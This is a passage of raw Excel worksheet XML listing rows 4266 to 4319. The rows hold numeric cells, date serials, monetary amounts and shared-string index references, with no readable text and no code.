        <v>100000</v>
      </c>
      <c r="I4266" t="s">
        <v>9550</v>
      </c>
      <c r="J4266" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4267" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4267">
        <v>24738</v>
      </c>
      <c r="B4267">
        <v>927</v>
      </c>
      <c r="C4267" t="s">
        <v>2649</v>
      </c>
      <c r="D4267" t="s">
        <v>12726</v>
      </c>
      <c r="E4267">
        <v>14</v>
      </c>
      <c r="F4267" t="s">
        <v>13502</v>
      </c>
      <c r="G4267" s="1">
        <v>44286</v>
      </c>
      <c r="H4267">
        <v>500000</v>
      </c>
      <c r="I4267" t="s">
        <v>13503</v>
      </c>
      <c r="J4267" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4268" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4268">
        <v>24739</v>
      </c>
      <c r="B4268">
        <v>927</v>
      </c>
      <c r="C4268" t="s">
        <v>2649</v>
      </c>
      <c r="D4268" t="s">
        <v>12726</v>
      </c>
      <c r="E4268">
        <v>14</v>
      </c>
      <c r="F4268" t="s">
        <v>13504</v>
      </c>
      <c r="G4268" s="1">
        <v>44286</v>
      </c>
      <c r="H4268">
        <v>500000</v>
      </c>
      <c r="I4268" t="s">
        <v>9836</v>
      </c>
      <c r="J4268" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4269" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4269">
        <v>24740</v>
      </c>
      <c r="B4269">
        <v>927</v>
      </c>
      <c r="C4269" t="s">
        <v>2649</v>
      </c>
      <c r="D4269" t="s">
        <v>12726</v>
      </c>
      <c r="E4269">
        <v>14</v>
      </c>
      <c r="F4269" t="s">
        <v>9437</v>
      </c>
      <c r="G4269" s="1">
        <v>44286</v>
      </c>
      <c r="H4269">
        <v>600000</v>
      </c>
      <c r="I4269" t="s">
        <v>12387</v>
      </c>
      <c r="J4269" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4270" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4270">
        <v>24741</v>
      </c>
      <c r="B4270">
        <v>927</v>
      </c>
      <c r="C4270" t="s">
        <v>2649</v>
      </c>
      <c r="D4270" t="s">
        <v>12726</v>
      </c>
      <c r="E4270">
        <v>14</v>
      </c>
      <c r="F4270" t="s">
        <v>9435</v>
      </c>
      <c r="G4270" s="1">
        <v>44286</v>
      </c>
      <c r="H4270">
        <v>600000</v>
      </c>
      <c r="I4270" t="s">
        <v>12727</v>
      </c>
      <c r="J4270" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4271" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4271">
        <v>24742</v>
      </c>
      <c r="B4271">
        <v>927</v>
      </c>
      <c r="C4271" t="s">
        <v>2649</v>
      </c>
      <c r="D4271" t="s">
        <v>12726</v>
      </c>
      <c r="E4271">
        <v>14</v>
      </c>
      <c r="F4271" t="s">
        <v>10071</v>
      </c>
      <c r="G4271" s="1">
        <v>44286</v>
      </c>
      <c r="H4271">
        <v>200000</v>
      </c>
      <c r="J4271" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4272" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4272">
        <v>24743</v>
      </c>
      <c r="B4272">
        <v>927</v>
      </c>
      <c r="C4272" t="s">
        <v>2649</v>
      </c>
      <c r="D4272" t="s">
        <v>12726</v>
      </c>
      <c r="E4272">
        <v>14</v>
      </c>
      <c r="F4272" t="s">
        <v>9595</v>
      </c>
      <c r="G4272" s="1">
        <v>44286</v>
      </c>
      <c r="H4272">
        <v>200000</v>
      </c>
      <c r="I4272" t="s">
        <v>12387</v>
      </c>
      <c r="J4272" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4273" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4273">
        <v>24744</v>
      </c>
      <c r="B4273">
        <v>927</v>
      </c>
      <c r="C4273" t="s">
        <v>2649</v>
      </c>
      <c r="D4273" t="s">
        <v>12726</v>
      </c>
      <c r="E4273">
        <v>14</v>
      </c>
      <c r="F4273" t="s">
        <v>1746</v>
      </c>
      <c r="G4273" s="1">
        <v>44286</v>
      </c>
      <c r="H4273">
        <v>300000</v>
      </c>
      <c r="I4273" t="s">
        <v>12387</v>
      </c>
      <c r="J4273" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4274" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4274">
        <v>24745</v>
      </c>
      <c r="B4274">
        <v>927</v>
      </c>
      <c r="C4274" t="s">
        <v>2649</v>
      </c>
      <c r="D4274" t="s">
        <v>12726</v>
      </c>
      <c r="E4274">
        <v>14</v>
      </c>
      <c r="F4274" t="s">
        <v>9846</v>
      </c>
      <c r="G4274" s="1">
        <v>44286</v>
      </c>
      <c r="H4274">
        <v>100000</v>
      </c>
      <c r="J4274" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4275" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4275">
        <v>24746</v>
      </c>
      <c r="B4275">
        <v>927</v>
      </c>
      <c r="C4275" t="s">
        <v>2649</v>
      </c>
      <c r="D4275" t="s">
        <v>12726</v>
      </c>
      <c r="E4275">
        <v>14</v>
      </c>
      <c r="F4275" t="s">
        <v>7564</v>
      </c>
      <c r="G4275" s="1">
        <v>44286</v>
      </c>
      <c r="H4275">
        <v>100000</v>
      </c>
      <c r="J4275" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4276" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4276">
        <v>24747</v>
      </c>
      <c r="B4276">
        <v>927</v>
      </c>
      <c r="C4276" t="s">
        <v>2649</v>
      </c>
      <c r="D4276" t="s">
        <v>12726</v>
      </c>
      <c r="E4276">
        <v>14</v>
      </c>
      <c r="F4276" t="s">
        <v>547</v>
      </c>
      <c r="G4276" s="1">
        <v>44286</v>
      </c>
      <c r="H4276">
        <v>100000</v>
      </c>
      <c r="J4276" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="4277" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4277">
        <v>24748</v>
      </c>
      <c r="B4277">
        <v>632</v>
      </c>
      <c r="C4277" t="s">
        <v>2342</v>
      </c>
      <c r="D4277" t="s">
        <v>13448</v>
      </c>
      <c r="E4277">
        <v>26</v>
      </c>
      <c r="F4277" t="s">
        <v>13505</v>
      </c>
      <c r="G4277" s="1">
        <v>44313</v>
      </c>
      <c r="H4277">
        <v>250000</v>
      </c>
      <c r="J4277" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4278" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4278">
        <v>24749</v>
      </c>
      <c r="B4278">
        <v>5510</v>
      </c>
      <c r="C4278" t="s">
        <v>3000</v>
      </c>
      <c r="D4278" t="s">
        <v>13506</v>
      </c>
      <c r="E4278">
        <v>29</v>
      </c>
      <c r="F4278" t="s">
        <v>13507</v>
      </c>
      <c r="G4278" s="1">
        <v>44286</v>
      </c>
      <c r="H4278">
        <v>150000</v>
      </c>
      <c r="I4278" t="s">
        <v>13508</v>
      </c>
    </row>
    <row r="4279" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4279">
        <v>24750</v>
      </c>
      <c r="B4279">
        <v>5311</v>
      </c>
      <c r="C4279" t="s">
        <v>8794</v>
      </c>
      <c r="D4279" t="s">
        <v>16537</v>
      </c>
      <c r="E4279">
        <v>23</v>
      </c>
      <c r="F4279" t="s">
        <v>1403</v>
      </c>
      <c r="G4279" s="1">
        <v>44319</v>
      </c>
      <c r="H4279" s="4">
        <v>1440</v>
      </c>
      <c r="I4279" t="s">
        <v>13509</v>
      </c>
      <c r="J4279" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4280" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4280">
        <v>24751</v>
      </c>
      <c r="B4280">
        <v>5504</v>
      </c>
      <c r="C4280" t="s">
        <v>2143</v>
      </c>
      <c r="D4280" t="s">
        <v>13510</v>
      </c>
      <c r="E4280">
        <v>11</v>
      </c>
      <c r="F4280" t="s">
        <v>2924</v>
      </c>
      <c r="G4280" s="1">
        <v>44355</v>
      </c>
      <c r="H4280">
        <v>100000</v>
      </c>
      <c r="I4280" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4281" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4281">
        <v>24752</v>
      </c>
      <c r="B4281">
        <v>5504</v>
      </c>
      <c r="C4281" t="s">
        <v>2143</v>
      </c>
      <c r="D4281" t="s">
        <v>13510</v>
      </c>
      <c r="E4281">
        <v>11</v>
      </c>
      <c r="F4281" t="s">
        <v>9438</v>
      </c>
      <c r="G4281" s="1">
        <v>44355</v>
      </c>
      <c r="H4281">
        <v>50000</v>
      </c>
      <c r="I4281" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4282" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4282">
        <v>24753</v>
      </c>
      <c r="B4282">
        <v>5504</v>
      </c>
      <c r="C4282" t="s">
        <v>2143</v>
      </c>
      <c r="D4282" t="s">
        <v>13510</v>
      </c>
      <c r="E4282">
        <v>11</v>
      </c>
      <c r="F4282" t="s">
        <v>9577</v>
      </c>
      <c r="G4282" s="1">
        <v>44355</v>
      </c>
      <c r="H4282">
        <v>50000</v>
      </c>
      <c r="I4282" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4283" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4283">
        <v>24754</v>
      </c>
      <c r="B4283">
        <v>5504</v>
      </c>
      <c r="C4283" t="s">
        <v>2143</v>
      </c>
      <c r="D4283" t="s">
        <v>13510</v>
      </c>
      <c r="E4283">
        <v>11</v>
      </c>
      <c r="F4283" t="s">
        <v>9435</v>
      </c>
      <c r="G4283" s="1">
        <v>44355</v>
      </c>
      <c r="H4283">
        <v>50000</v>
      </c>
      <c r="I4283" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4284" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4284">
        <v>24755</v>
      </c>
      <c r="B4284">
        <v>5504</v>
      </c>
      <c r="C4284" t="s">
        <v>2143</v>
      </c>
      <c r="D4284" t="s">
        <v>13510</v>
      </c>
      <c r="E4284">
        <v>11</v>
      </c>
      <c r="F4284" t="s">
        <v>9676</v>
      </c>
      <c r="G4284" s="1">
        <v>44355</v>
      </c>
      <c r="H4284">
        <v>50000</v>
      </c>
      <c r="I4284" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4285" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4285">
        <v>24756</v>
      </c>
      <c r="B4285">
        <v>5504</v>
      </c>
      <c r="C4285" t="s">
        <v>2143</v>
      </c>
      <c r="D4285" t="s">
        <v>13510</v>
      </c>
      <c r="E4285">
        <v>11</v>
      </c>
      <c r="F4285" t="s">
        <v>13512</v>
      </c>
      <c r="G4285" s="1">
        <v>44355</v>
      </c>
      <c r="H4285">
        <v>50000</v>
      </c>
      <c r="I4285" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4286" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4286">
        <v>24757</v>
      </c>
      <c r="B4286">
        <v>5504</v>
      </c>
      <c r="C4286" t="s">
        <v>2143</v>
      </c>
      <c r="D4286" t="s">
        <v>13510</v>
      </c>
      <c r="E4286">
        <v>11</v>
      </c>
      <c r="F4286" t="s">
        <v>9595</v>
      </c>
      <c r="G4286" s="1">
        <v>44355</v>
      </c>
      <c r="H4286">
        <v>50000</v>
      </c>
      <c r="I4286" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4287" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4287">
        <v>24758</v>
      </c>
      <c r="B4287">
        <v>5504</v>
      </c>
      <c r="C4287" t="s">
        <v>2143</v>
      </c>
      <c r="D4287" t="s">
        <v>13510</v>
      </c>
      <c r="E4287">
        <v>11</v>
      </c>
      <c r="F4287" t="s">
        <v>9928</v>
      </c>
      <c r="G4287" s="1">
        <v>44355</v>
      </c>
      <c r="H4287">
        <v>50000</v>
      </c>
      <c r="I4287" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4288" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4288">
        <v>24759</v>
      </c>
      <c r="B4288">
        <v>567</v>
      </c>
      <c r="C4288" t="s">
        <v>2372</v>
      </c>
      <c r="D4288" t="s">
        <v>13513</v>
      </c>
      <c r="E4288">
        <v>11</v>
      </c>
      <c r="F4288" t="s">
        <v>13514</v>
      </c>
      <c r="G4288" s="1">
        <v>44313</v>
      </c>
      <c r="H4288">
        <v>100000</v>
      </c>
      <c r="I4288" t="s">
        <v>9550</v>
      </c>
      <c r="J4288" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4289" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4289">
        <v>24760</v>
      </c>
      <c r="B4289">
        <v>567</v>
      </c>
      <c r="C4289" t="s">
        <v>2372</v>
      </c>
      <c r="D4289" t="s">
        <v>13513</v>
      </c>
      <c r="E4289">
        <v>11</v>
      </c>
      <c r="F4289" t="s">
        <v>9586</v>
      </c>
      <c r="G4289" s="1">
        <v>44313</v>
      </c>
      <c r="H4289">
        <v>100000</v>
      </c>
      <c r="I4289" t="s">
        <v>9550</v>
      </c>
      <c r="J4289" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4290" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4290">
        <v>24761</v>
      </c>
      <c r="B4290">
        <v>567</v>
      </c>
      <c r="C4290" t="s">
        <v>2372</v>
      </c>
      <c r="D4290" t="s">
        <v>13513</v>
      </c>
      <c r="E4290">
        <v>11</v>
      </c>
      <c r="F4290" t="s">
        <v>9437</v>
      </c>
      <c r="G4290" s="1">
        <v>44313</v>
      </c>
      <c r="H4290">
        <v>10000</v>
      </c>
      <c r="I4290" t="s">
        <v>9550</v>
      </c>
      <c r="J4290" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4291" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4291">
        <v>24762</v>
      </c>
      <c r="B4291">
        <v>108</v>
      </c>
      <c r="C4291" t="s">
        <v>2350</v>
      </c>
      <c r="D4291" t="s">
        <v>13515</v>
      </c>
      <c r="E4291">
        <v>12</v>
      </c>
      <c r="F4291" t="s">
        <v>11964</v>
      </c>
      <c r="G4291" s="1">
        <v>44322</v>
      </c>
      <c r="H4291">
        <v>0</v>
      </c>
      <c r="J4291" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4292" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4292">
        <v>24763</v>
      </c>
      <c r="B4292">
        <v>108</v>
      </c>
      <c r="C4292" t="s">
        <v>2350</v>
      </c>
      <c r="D4292" t="s">
        <v>13515</v>
      </c>
      <c r="E4292">
        <v>12</v>
      </c>
      <c r="F4292" t="s">
        <v>4508</v>
      </c>
      <c r="G4292" s="1">
        <v>44322</v>
      </c>
      <c r="H4292">
        <v>0</v>
      </c>
      <c r="J4292" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4293" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4293">
        <v>24764</v>
      </c>
      <c r="B4293">
        <v>108</v>
      </c>
      <c r="C4293" t="s">
        <v>2350</v>
      </c>
      <c r="D4293" t="s">
        <v>13515</v>
      </c>
      <c r="E4293">
        <v>12</v>
      </c>
      <c r="F4293" t="s">
        <v>3814</v>
      </c>
      <c r="G4293" s="1">
        <v>44322</v>
      </c>
      <c r="H4293">
        <v>0</v>
      </c>
      <c r="J4293" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4294" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4294">
        <v>24765</v>
      </c>
      <c r="B4294">
        <v>108</v>
      </c>
      <c r="C4294" t="s">
        <v>16538</v>
      </c>
      <c r="D4294" t="s">
        <v>16539</v>
      </c>
      <c r="E4294">
        <v>12</v>
      </c>
      <c r="F4294" t="s">
        <v>1746</v>
      </c>
      <c r="G4294" s="1">
        <v>44322</v>
      </c>
      <c r="H4294" s="4">
        <v>42150</v>
      </c>
      <c r="J4294" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4295" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4295">
        <v>24766</v>
      </c>
      <c r="B4295">
        <v>108</v>
      </c>
      <c r="C4295" t="s">
        <v>2350</v>
      </c>
      <c r="D4295" t="s">
        <v>13515</v>
      </c>
      <c r="E4295">
        <v>12</v>
      </c>
      <c r="F4295" t="s">
        <v>9675</v>
      </c>
      <c r="G4295" s="1">
        <v>44322</v>
      </c>
      <c r="H4295">
        <v>0</v>
      </c>
      <c r="J4295" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4296" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4296">
        <v>24767</v>
      </c>
      <c r="B4296">
        <v>108</v>
      </c>
      <c r="C4296" t="s">
        <v>2350</v>
      </c>
      <c r="D4296" t="s">
        <v>13515</v>
      </c>
      <c r="E4296">
        <v>12</v>
      </c>
      <c r="F4296" t="s">
        <v>9523</v>
      </c>
      <c r="G4296" s="1">
        <v>44322</v>
      </c>
      <c r="H4296">
        <v>0</v>
      </c>
      <c r="J4296" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4297" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4297">
        <v>24779</v>
      </c>
      <c r="B4297">
        <v>108</v>
      </c>
      <c r="C4297" t="s">
        <v>2350</v>
      </c>
      <c r="D4297" t="s">
        <v>13515</v>
      </c>
      <c r="E4297">
        <v>12</v>
      </c>
      <c r="F4297" t="s">
        <v>9577</v>
      </c>
      <c r="G4297" s="1">
        <v>44322</v>
      </c>
      <c r="H4297">
        <v>0</v>
      </c>
      <c r="J4297" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4298" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4298">
        <v>24780</v>
      </c>
      <c r="B4298">
        <v>108</v>
      </c>
      <c r="C4298" t="s">
        <v>16538</v>
      </c>
      <c r="D4298" t="s">
        <v>16539</v>
      </c>
      <c r="E4298">
        <v>12</v>
      </c>
      <c r="F4298" t="s">
        <v>9435</v>
      </c>
      <c r="G4298" s="1">
        <v>44322</v>
      </c>
      <c r="H4298" s="4">
        <v>57398</v>
      </c>
      <c r="J4298" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4299" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4299">
        <v>24781</v>
      </c>
      <c r="B4299">
        <v>108</v>
      </c>
      <c r="C4299" t="s">
        <v>2350</v>
      </c>
      <c r="D4299" t="s">
        <v>13515</v>
      </c>
      <c r="E4299">
        <v>12</v>
      </c>
      <c r="F4299" t="s">
        <v>11215</v>
      </c>
      <c r="G4299" s="1">
        <v>44322</v>
      </c>
      <c r="H4299">
        <v>0</v>
      </c>
      <c r="J4299" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4300" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4300">
        <v>24782</v>
      </c>
      <c r="B4300">
        <v>108</v>
      </c>
      <c r="C4300" t="s">
        <v>2350</v>
      </c>
      <c r="D4300" t="s">
        <v>13515</v>
      </c>
      <c r="E4300">
        <v>12</v>
      </c>
      <c r="F4300" t="s">
        <v>9460</v>
      </c>
      <c r="G4300" s="1">
        <v>44322</v>
      </c>
      <c r="H4300">
        <v>0</v>
      </c>
      <c r="J4300" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4301" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4301">
        <v>24783</v>
      </c>
      <c r="B4301">
        <v>108</v>
      </c>
      <c r="C4301" t="s">
        <v>2350</v>
      </c>
      <c r="D4301" t="s">
        <v>13515</v>
      </c>
      <c r="E4301">
        <v>12</v>
      </c>
      <c r="F4301" t="s">
        <v>9578</v>
      </c>
      <c r="G4301" s="1">
        <v>44322</v>
      </c>
      <c r="H4301">
        <v>0</v>
      </c>
      <c r="J4301" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4302" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4302">
        <v>24784</v>
      </c>
      <c r="B4302">
        <v>108</v>
      </c>
      <c r="C4302" t="s">
        <v>2350</v>
      </c>
      <c r="D4302" t="s">
        <v>13515</v>
      </c>
      <c r="E4302">
        <v>12</v>
      </c>
      <c r="F4302" t="s">
        <v>9579</v>
      </c>
      <c r="G4302" s="1">
        <v>44322</v>
      </c>
      <c r="H4302">
        <v>0</v>
      </c>
      <c r="J4302" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4303" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4303">
        <v>24785</v>
      </c>
      <c r="B4303">
        <v>5505</v>
      </c>
      <c r="C4303" t="s">
        <v>2168</v>
      </c>
      <c r="D4303" t="s">
        <v>13517</v>
      </c>
      <c r="E4303">
        <v>11</v>
      </c>
      <c r="F4303" t="s">
        <v>2924</v>
      </c>
      <c r="G4303" s="1">
        <v>44312</v>
      </c>
      <c r="H4303">
        <v>200000</v>
      </c>
      <c r="I4303" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4304" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4304">
        <v>24786</v>
      </c>
      <c r="B4304">
        <v>5505</v>
      </c>
      <c r="C4304" t="s">
        <v>2168</v>
      </c>
      <c r="D4304" t="s">
        <v>13517</v>
      </c>
      <c r="E4304">
        <v>11</v>
      </c>
      <c r="F4304" t="s">
        <v>9438</v>
      </c>
      <c r="G4304" s="1">
        <v>44312</v>
      </c>
      <c r="H4304">
        <v>150000</v>
      </c>
      <c r="I4304" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4305" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4305">
        <v>24787</v>
      </c>
      <c r="B4305">
        <v>5505</v>
      </c>
      <c r="C4305" t="s">
        <v>2168</v>
      </c>
      <c r="D4305" t="s">
        <v>13517</v>
      </c>
      <c r="E4305">
        <v>11</v>
      </c>
      <c r="F4305" t="s">
        <v>9577</v>
      </c>
      <c r="G4305" s="1">
        <v>44312</v>
      </c>
      <c r="H4305">
        <v>100000</v>
      </c>
      <c r="I4305" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4306" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4306">
        <v>24788</v>
      </c>
      <c r="B4306">
        <v>5505</v>
      </c>
      <c r="C4306" t="s">
        <v>2168</v>
      </c>
      <c r="D4306" t="s">
        <v>13517</v>
      </c>
      <c r="E4306">
        <v>11</v>
      </c>
      <c r="F4306" t="s">
        <v>9435</v>
      </c>
      <c r="G4306" s="1">
        <v>44312</v>
      </c>
      <c r="H4306">
        <v>150000</v>
      </c>
      <c r="I4306" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4307" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4307">
        <v>24789</v>
      </c>
      <c r="B4307">
        <v>5505</v>
      </c>
      <c r="C4307" t="s">
        <v>2168</v>
      </c>
      <c r="D4307" t="s">
        <v>13517</v>
      </c>
      <c r="E4307">
        <v>11</v>
      </c>
      <c r="F4307" t="s">
        <v>13512</v>
      </c>
      <c r="G4307" s="1">
        <v>44312</v>
      </c>
      <c r="H4307">
        <v>150000</v>
      </c>
      <c r="I4307" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4308" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4308">
        <v>24790</v>
      </c>
      <c r="B4308">
        <v>5505</v>
      </c>
      <c r="C4308" t="s">
        <v>2168</v>
      </c>
      <c r="D4308" t="s">
        <v>13517</v>
      </c>
      <c r="E4308">
        <v>11</v>
      </c>
      <c r="F4308" t="s">
        <v>9595</v>
      </c>
      <c r="G4308" s="1">
        <v>44312</v>
      </c>
      <c r="H4308">
        <v>50000</v>
      </c>
      <c r="I4308" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4309" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4309">
        <v>24791</v>
      </c>
      <c r="B4309">
        <v>5505</v>
      </c>
      <c r="C4309" t="s">
        <v>2168</v>
      </c>
      <c r="D4309" t="s">
        <v>13517</v>
      </c>
      <c r="E4309">
        <v>11</v>
      </c>
      <c r="F4309" t="s">
        <v>9676</v>
      </c>
      <c r="G4309" s="1">
        <v>44312</v>
      </c>
      <c r="H4309">
        <v>100000</v>
      </c>
      <c r="I4309" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="4310" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4310">
        <v>24792</v>
      </c>
      <c r="B4310">
        <v>108</v>
      </c>
      <c r="C4310" t="s">
        <v>16538</v>
      </c>
      <c r="D4310" t="s">
        <v>16539</v>
      </c>
      <c r="E4310">
        <v>12</v>
      </c>
      <c r="F4310" t="s">
        <v>7296</v>
      </c>
      <c r="G4310" s="1">
        <v>44322</v>
      </c>
      <c r="H4310" t="s">
        <v>16272</v>
      </c>
      <c r="J4310" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4311" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4311">
        <v>24793</v>
      </c>
      <c r="B4311">
        <v>108</v>
      </c>
      <c r="C4311" t="s">
        <v>16538</v>
      </c>
      <c r="D4311" t="s">
        <v>16539</v>
      </c>
      <c r="E4311">
        <v>12</v>
      </c>
      <c r="F4311" t="s">
        <v>9925</v>
      </c>
      <c r="G4311" s="1">
        <v>44322</v>
      </c>
      <c r="H4311" t="s">
        <v>16273</v>
      </c>
      <c r="J4311" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4312" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4312">
        <v>24805</v>
      </c>
      <c r="B4312">
        <v>108</v>
      </c>
      <c r="C4312" t="s">
        <v>2350</v>
      </c>
      <c r="D4312" t="s">
        <v>13515</v>
      </c>
      <c r="E4312">
        <v>12</v>
      </c>
      <c r="F4312" t="s">
        <v>9527</v>
      </c>
      <c r="G4312" s="1">
        <v>44322</v>
      </c>
      <c r="H4312">
        <v>0</v>
      </c>
      <c r="J4312" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4313" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4313">
        <v>24806</v>
      </c>
      <c r="B4313">
        <v>108</v>
      </c>
      <c r="C4313" t="s">
        <v>16538</v>
      </c>
      <c r="D4313" t="s">
        <v>16539</v>
      </c>
      <c r="E4313">
        <v>12</v>
      </c>
      <c r="F4313" t="s">
        <v>9437</v>
      </c>
      <c r="G4313" s="1">
        <v>44322</v>
      </c>
      <c r="H4313" s="4">
        <v>20080</v>
      </c>
      <c r="J4313" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4314" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4314">
        <v>24807</v>
      </c>
      <c r="B4314">
        <v>108</v>
      </c>
      <c r="C4314" t="s">
        <v>2350</v>
      </c>
      <c r="D4314" t="s">
        <v>13515</v>
      </c>
      <c r="E4314">
        <v>12</v>
      </c>
      <c r="F4314" t="s">
        <v>4686</v>
      </c>
      <c r="G4314" s="1">
        <v>44322</v>
      </c>
      <c r="H4314">
        <v>0</v>
      </c>
      <c r="J4314" t="s">
        <v>13516</v>
      </c>
    </row>
    <row r="4315" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4315">
        <v>24808</v>
      </c>
      <c r="B4315">
        <v>108</v>
      </c>
      <c r="C4315" t="s">
        <v>16538</v>
      </c>
      <c r="D4315" t="s">
        <v>16539</v>
      </c>
      <c r="E4315">
        <v>12</v>
      </c>
      <c r="F4315" t="s">
        <v>2236</v>
      </c>
      <c r="G4315" s="1">
        <v>44322</v>
      </c>
      <c r="H4315" t="s">
        <v>16274</v>
      </c>
      <c r="J4315" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4316" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4316">
        <v>24809</v>
      </c>
      <c r="B4316">
        <v>108</v>
      </c>
      <c r="C4316" t="s">
        <v>16538</v>
      </c>
      <c r="D4316" t="s">
        <v>16539</v>
      </c>
      <c r="E4316">
        <v>12</v>
      </c>
      <c r="F4316" t="s">
        <v>13518</v>
      </c>
      <c r="G4316" s="1">
        <v>44322</v>
      </c>
      <c r="H4316">
        <v>707.6</v>
      </c>
      <c r="J4316" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4317" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4317">
        <v>24811</v>
      </c>
      <c r="B4317">
        <v>108</v>
      </c>
      <c r="C4317" t="s">
        <v>16538</v>
      </c>
      <c r="D4317" t="s">
        <v>16539</v>
      </c>
      <c r="E4317">
        <v>12</v>
      </c>
      <c r="F4317" t="s">
        <v>13519</v>
      </c>
      <c r="G4317" s="1">
        <v>44322</v>
      </c>
      <c r="H4317">
        <v>193.7</v>
      </c>
      <c r="J4317" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4318" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4318">
        <v>24812</v>
      </c>
      <c r="B4318">
        <v>108</v>
      </c>
      <c r="C4318" t="s">
        <v>16538</v>
      </c>
      <c r="D4318" t="s">
        <v>16539</v>
      </c>
      <c r="E4318">
        <v>12</v>
      </c>
      <c r="F4318" t="s">
        <v>13520</v>
      </c>
      <c r="G4318" s="1">
        <v>44322</v>
      </c>
      <c r="H4318" s="3" t="s">
        <v>16275</v>
      </c>
      <c r="J4318" t="s">
        <v>13521</v>
      </c>
    </row>
    <row r="4319" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4319">
        <v>24813</v>
      </c>
      <c r="B4319">
        <v>108</v>
      </c>
